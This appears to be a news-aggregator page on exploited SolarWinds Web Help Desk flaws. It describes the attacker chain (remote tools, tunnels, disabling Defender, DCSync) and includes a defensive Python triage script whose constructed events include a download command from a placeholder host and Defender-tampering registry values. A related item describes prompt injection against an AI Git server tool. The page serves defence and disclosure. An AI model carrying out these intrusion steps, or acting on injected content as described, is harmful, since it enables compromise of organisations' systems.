Multiple Critical Vulnerabilities in SolarWinds Web Help Desk

3 unique sources, 8 articles

Summary

SolarWinds has released security updates to address multiple critical vulnerabilities in SolarWinds Web Help Desk (WHD): CVE-2025-40536, CVE-2025-40537, CVE-2025-40551, CVE-2025-40552, CVE-2025-40553, and CVE-2025-40554. These vulnerabilities could result in authentication bypass and remote code execution (RCE). CVE-2025-40551 is actively exploited in attacks and has been added to CISA's Known Exploited Vulnerabilities (KEV) catalog. SolarWinds Web Help Desk is a help desk and ticketing suite used by medium-to-large organizations for IT support request tracking, workflow automation, asset management, and compliance assurance; it has more than 300,000 customers worldwide, including government agencies, large corporations, healthcare organizations, and educational institutions.

SolarWinds had previously released a third patch for a critical deserialization vulnerability (CVE-2025-26399) in Web Help Desk 12.8.7 and earlier versions. This flaw allows unauthenticated remote code execution on affected systems. It was discovered by an anonymous researcher and reported through Trend Micro's Zero Day Initiative (ZDI). The flaw is a patch bypass for CVE-2024-28988, which itself was a bypass for CVE-2024-28986; the original vulnerability was exploited in the wild and added to CISA's KEV catalog. The vulnerability affects the AjaxProxy component. SolarWinds advises users to update to version 12.8.7 HF1 to mitigate the risk; the hotfix requires replacing specific JAR files.

Microsoft has revealed that it observed a multi-stage intrusion in which the threat actors exploited internet-exposed SolarWinds WHD instances to obtain initial access and then moved laterally across the organization's network to other high-value assets. The attackers used legitimate components associated with Zoho ManageEngine to enable persistent remote control over the infected system. They enumerated sensitive domain users and groups, established persistence via reverse SSH and RDP access, and conducted a DCSync attack to request password hashes and other sensitive information from the Active Directory (AD) database.

Researchers at Huntress Security spotted threat actors exploiting CVE-2025-40551 and CVE-2025-26399 to deploy legitimate tools for malicious purposes, namely Zoho ManageEngine Assist for remote monitoring and management and Velociraptor for command and control (C2). The activity is believed to be part of a campaign that started on January 16; the attackers targeted at least three organizations and leveraged Cloudflare tunnels for persistence. They installed the Zoho ManageEngine Assist agent via an MSI file fetched from the Catbox file-hosting platform, configured the tool for unattended access, and registered the compromised host to a Zoho Assist account tied to an anonymous Proton Mail address. Velociraptor served as a C2 framework that communicates with the attackers via Cloudflare Workers; the attackers used an outdated version (0.73.4), which is vulnerable to a privilege escalation flaw. They also installed Cloudflared from Cloudflare's official GitHub repository as a secondary tunnel-based access channel for C2 redundancy. The attackers disabled Windows Defender and the Windows Firewall via registry modifications so that fetching additional payloads would not be blocked, and downloaded a fresh copy of the VS Code binary approximately a second after disabling Defender.

System administrators are recommended to upgrade SolarWinds Web Help Desk to version 2026.1 or later, remove public internet access to SolarWinds WHD admin interfaces, and reset all credentials associated with the product.
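The chain above (Defender and firewall tampering followed about a second later by a download, an outdated Velociraptor 0.73.4 client, and a cloudflared tunnel) is easy to express as a telemetry triage rule. The following is an added example with constructed events, not code from this page or from any vendor named in it; the registry value names are this example's assumptions, since the page does not say which keys were modified.

```python
import re
from datetime import datetime, timedelta

# Constructed endpoint telemetry: (ISO timestamp, event type, detail). Not real logs.
SAMPLE_EVENTS = [
    ("2026-01-16T10:00:00", "registry_set",
     r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = 1"),
    ("2026-01-16T10:00:01", "process",
     "curl.exe -o C:\\Users\\Public\\code.exe https://example.invalid/vscode.exe"),
    ("2026-01-16T10:05:00", "process", "velociraptor.exe client --version 0.73.4"),
    ("2026-01-16T10:06:00", "process", "cloudflared.exe tunnel run --token <placeholder>"),
    ("2026-01-16T11:00:00", "process", "notepad.exe C:\\notes.txt"),
]

# Policy values that turn off Defender/firewall. The page only says "registry
# modifications" were used, so which values were touched is an assumption here.
TAMPER_VALUES = ("DisableAntiSpyware", "DisableRealtimeMonitoring", "EnableFirewall")
OUTDATED_VELOCIRAPTOR = (0, 73, 4)  # version named on the page; older builds treated the same
DOWNLOAD_RE = re.compile(r"https?://", re.IGNORECASE)

def parse_version(cmdline):
    """Extract the first x.y.z version from a command line as an int tuple."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", cmdline)
    return tuple(int(x) for x in m.groups()) if m else None

def triage(events, window_seconds=5):
    """Return (rule, timestamp) findings for the intrusion chain described above."""
    findings = []
    parsed = [(datetime.fromisoformat(ts), kind, detail) for ts, kind, detail in events]
    for i, (ts, kind, detail) in enumerate(parsed):
        if kind == "registry_set" and any(v in detail for v in TAMPER_VALUES):
            # Defender/firewall tampering followed almost immediately by a download.
            for ts2, kind2, detail2 in parsed[i + 1:]:
                if ts2 - ts > timedelta(seconds=window_seconds):
                    break
                if kind2 == "process" and DOWNLOAD_RE.search(detail2):
                    findings.append(("defender_tamper_then_download", ts2.isoformat()))
                    break
        elif kind == "process":
            exe = detail.split()[0].lower()
            if exe == "velociraptor.exe":
                ver = parse_version(detail)
                if ver and ver <= OUTDATED_VELOCIRAPTOR:
                    findings.append(("outdated_velociraptor", ts.isoformat()))
            elif exe == "cloudflared.exe" and "tunnel" in detail:
                findings.append(("cloudflared_tunnel", ts.isoformat()))
    return findings
```

Each rule alone is noisy on an estate that legitimately uses Velociraptor or cloudflared; the value is in the tamper-then-download sequence and in seeing all three on one host.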

Timeline

  1. 09.02.2026 16:42 (2 articles)

    Microsoft details multi-stage attacks exploiting SolarWinds Web Help Desk

    Threat actors have been exploiting CVE-2025-40551 and CVE-2025-26399 to deploy legitimate tools for malicious purposes, such as Zoho ManageEngine and Velociraptor. The attackers targeted at least three organizations and leveraged Cloudflare tunnels for persistence. The malicious activity was spotted by researchers at Huntress Security and is believed to be part of a campaign that started on January 16. The attackers used Velociraptor for command and control (C2) and Zoho ManageEngine for remote monitoring and management. The attackers installed the Zoho ManageEngine Assist agent via an MSI file fetched from the Catbox file-hosting platform and configured the tool for unattended access. They registered the compromised host to a Zoho Assist account tied to an anonymous Proton Mail address. The attackers used Velociraptor as a command-and-control (C2) framework that communicates with attackers via Cloudflare Workers. The attackers used an outdated version of Velociraptor (0.73.4), which is vulnerable to a privilege escalation flaw. The attackers installed Cloudflared from Cloudflare's official GitHub repository as a secondary tunnel-based access channel for C2 redundancy. The attackers disabled Windows Defender and Firewall via registry modifications to ensure that fetching additional payloads would not be blocked. The attackers downloaded a fresh copy of the VS Code binary approximately a second after disabling Defender. System administrators are recommended to upgrade SolarWinds Web Help Desk to version 2026.1 or later, remove public internet access to SolarWinds WHD admin interfaces, and reset all credentials associated with the product.

  2. 29.01.2026 11:00 (6 articles)

    SolarWinds releases updates for four critical Web Help Desk flaws

  3. 23.09.2025 15:46 (3 articles)

    SolarWinds releases hotfix for critical deserialization vulnerability in Web Help Desk

    This hotfix is the third attempt to address the original flaw, CVE-2024-28986. SolarWinds Web Help Desk is used by medium-to-large organizations for IT support request tracking, workflow automation, asset management, and compliance assurance. The vulnerability affects the AjaxProxy component and is caused by unsafe deserialization handling. The hotfix requires installing Web Help Desk version 12.8.7 and replacing specific JAR files.

Similar Happenings

Critical Pre-Auth RCE Vulnerability in BeyondTrust Remote Support and PRA

BeyondTrust has patched a critical pre-authentication remote code execution (RCE) vulnerability (CVE-2026-1731, CVSS 9.9) in Remote Support (RS) and Privileged Remote Access (PRA) products. The flaw could allow unauthenticated attackers to execute OS commands in the context of the site user, leading to unauthorized access, data exfiltration, and service disruption. The vulnerability affects RS versions 25.3.1 and prior, and PRA versions 24.3.4 and prior. Patches are available in RS versions 25.3.2 and later, and PRA versions 25.1.1 and later. Self-hosted customers must manually apply updates if not subscribed to automatic updates. The vulnerability was discovered on January 31, 2026, with approximately 11,000 exposed instances identified, including around 8,500 on-prem deployments. BeyondTrust secured all RS/PRA cloud systems by February 2, 2026. The flaw was discovered by Harsh Jaiswal and the Hacktron AI team. Threat actors can exploit the flaw through maliciously crafted client requests in low-complexity attacks that do not require user interaction. In June 2025, BeyondTrust fixed a high-severity RS/PRA Server-Side Template Injection vulnerability.

Critical Authentication Bypass and RCE Flaws in SolarWinds Web Help Desk

SolarWinds has released patches for critical vulnerabilities in its Web Help Desk software, including authentication bypass and remote code execution (RCE) flaws. The vulnerabilities, reported by security researchers, can be exploited by unauthenticated attackers in low-complexity attacks. The company advises immediate patching due to the high risk of exploitation.

Three Flaws in Anthropic MCP Git Server Enable File Access and Code Execution

Three vulnerabilities in the mcp-server-git, maintained by Anthropic, allow file access, deletion, and code execution via prompt injection. The flaws have been addressed in versions 2025.9.25 and 2025.12.18. The vulnerabilities include path traversal and argument injection issues that can be exploited to manipulate Git repositories and execute arbitrary code. The issues were disclosed by Cyata researcher Yarden Porat, highlighting the risks of prompt injection attacks without direct system access. The vulnerabilities affect all versions of mcp-server-git released before December 8, 2025, and apply to default installations. An attacker only needs to influence what an AI assistant reads to trigger the vulnerabilities. The flaws allow attackers to execute code, delete arbitrary files, and load arbitrary files into a large language model's context. While the vulnerabilities do not directly exfiltrate data, sensitive files may still be exposed to the AI, creating downstream security and privacy risks. The vulnerabilities have been assigned CVE-2025-68143, CVE-2025-68144, and CVE-2025-68145.

Critical RCE Flaw in Trend Micro Apex Central On-Prem Windows

Trend Micro has addressed critical vulnerabilities in on-premise Windows versions of Apex Central, including a remote code execution (RCE) flaw (CVE-2025-69258) with a CVSS score of 9.8. The flaw allows unauthenticated remote attackers to execute arbitrary code under SYSTEM context. Two additional flaws (CVE-2025-69259, CVE-2025-69260) with CVSS scores of 7.5 each can cause denial-of-service conditions. The vulnerabilities affect versions below Build 7190 and require physical or remote access to exploit. Apex Central is a web-based management console that helps admins manage multiple Trend Micro products and services, including antivirus, content security, and threat detection. Trend Micro has released Critical Patch Build 7190 to address these vulnerabilities.

CISA Adds Actively Exploited Microsoft Office and HPE OneView Vulnerabilities to KEV Catalog

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added two vulnerabilities affecting Microsoft Office and HPE OneView to its Known Exploited Vulnerabilities (KEV) catalog, indicating active exploitation. The vulnerabilities include CVE-2009-0556 in Microsoft Office PowerPoint and CVE-2025-37164 in HPE OneView. The flaws allow for remote code execution and memory corruption. CISA urges federal agencies to apply patches by January 28, 2026, to mitigate risks. A proof-of-concept (PoC) exploit for CVE-2025-37164 has been publicly released, increasing the risk of exploitation.